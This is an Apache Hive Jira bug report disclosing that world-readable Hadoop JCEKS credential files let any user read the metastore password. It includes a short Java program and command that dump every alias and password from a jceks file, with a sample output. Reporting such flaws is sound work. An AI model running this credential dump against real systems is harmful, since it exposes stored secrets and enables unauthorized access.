Uploaded image for project: 'Hive'
  1. Hive
  2. HIVE-19746

Hadoop credential provider allows to read passwords for every user

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Open
    • Blocker
    • Resolution: Unresolved
    • None
    • None
    • Security
    • None

    Description

      This simple program allows to read any password from any jceks file:

      package com.test.app;

import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

import java.io.IOException;

public class PasswordReader {
  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0){
      throw new IllegalArgumentException("Credential provider path is to set");
    }
    String credentialProviderPath = args[0];
    Configuration configuration = new Configuration();
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
    CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();
    for(String alias : aliases){
      System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
    }
  }
}

      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  jceks://hdfs/user/hive/hivemetastore.jceks

      RESULT

      javax.jdo.option.connectionpassword = 123456

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world readable permissions here, because Hive is configured for impersonation to allow users user than hdfs connect to HiveServer2. When removed world readable permissions and tried to connect as other user, I got the exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
    at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
    at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)

      Any ideas how to protect passwords (let's say restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time be available to connect to HS2 as not admin user?

      Attachments

        Issue Links

          relates to

          New Feature - A new feature of the product, which has yet to be developed. HADOOP-10607 Create an API to Separate Credentials/Password Storage from Applications

          • Major - Major loss of function.
          • Closed

          Activity

            People

              osayankin Oleksiy Sayankin
              osayankin Oleksiy Sayankin
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated: